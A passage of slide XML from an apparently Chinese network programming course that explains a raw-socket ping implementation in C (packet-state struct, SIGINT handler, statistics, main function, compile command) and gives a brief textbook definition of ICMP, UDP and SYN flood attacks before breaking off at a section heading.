              </a:rPr>
              <a:t>pingpacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>用于保存发送数据报文的状态</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRP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保存已经发送包的状态值</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typedef struct pingm_pakcet{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>       struct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>timeval tv_begin;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发送的时间</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struct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>timeval tv_end;</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接收到的时间</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short </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>seq;</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序列号</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int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>flag;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>	/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="-2500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，表示已经发送但没有接收到回应包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>，表示接收到回应包</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}pingm_pakcet;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>static pingm_pakcet pingpacket[128];</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3114367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．信号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>SIGINT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>处理函数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>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终端信号处理函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>SIGINT</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static void icmp_sigint(int signo)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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      alive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>= 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告诉接收和发送线程结束程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="-2500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      gettimeofday</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>(&amp;tv_end, NULL</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读取程序结束时间</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      tv_interval </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>= icmp_tvsub(tv_end, tv_begin);</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计算一下总共所用时间</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      return;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRP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636257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．查找数组中的标识函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>icmp_findpacket()</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icmp_findpacket()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>用于在数组</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>pingpacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>中查找一个报文的标识，参数为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>–1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>时表示查找一个空包，存放已经发送成功的数据报文；其他值表示查找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>匹配的标识。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1068514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．统计数据结果函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>icmp_statistics()</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icmp_statistics()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>函数用于统计总体的结果，包含成功发送的报文数量、成功接收的报文数量、丢失报文的百分比和总共程序运行的时间。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3048519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13.6.9  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>主函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>main()</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latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>在主程序中需要注意如下几点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>getprotobyname()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>函数获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>对应的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>协议值。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>对输入的目的主机地址兼容域名和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>地址，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>gethostbyname()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>函数来获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>对应的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>地址，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>inet_addr()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>函数获得字符串类型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>地址对应的整型值。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>为了防止远程主机发送过大的包或者本地来不及接收现象的发生，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>setsockopt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>函数将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的接收缓冲区设置为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>128KB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>对信号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>SIGINT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>进行了截取。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>建立两个线程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>icmp_send()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>icmp_recv()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>进行接收和发送，然后主程序等待两个线程结束。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>．主函数初始化</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>．进行数据报文发送之前的准备工作</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>．发送数据并接收回应</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="300735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13.2  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>原始套接字的创建</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>13.2.1  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SOCK_RAW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>选项</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>13.2.2  IP_HDRINCL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>套接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>选项</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>13.2.3  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>不需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>bind()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>函数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3789362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13.6.10  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>编译测试</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将所有的代码保存到文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ping.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>中，使用如下命令方式进行编译，生成可执行文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ping</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$gcc –o ping  ping.c -lpthread</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="294123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13.7  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>洪 水 攻 击</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洪水攻击（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>FLOOD ATTACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>）指的是利用计算机网络技术向目标机发送大量的无用数据报文，使得目标主机忙于处理无用的数据报文而无法提供正常服务的网络行为。洪水攻击主要分为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>种类型。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3604419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13.8  ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>洪水攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
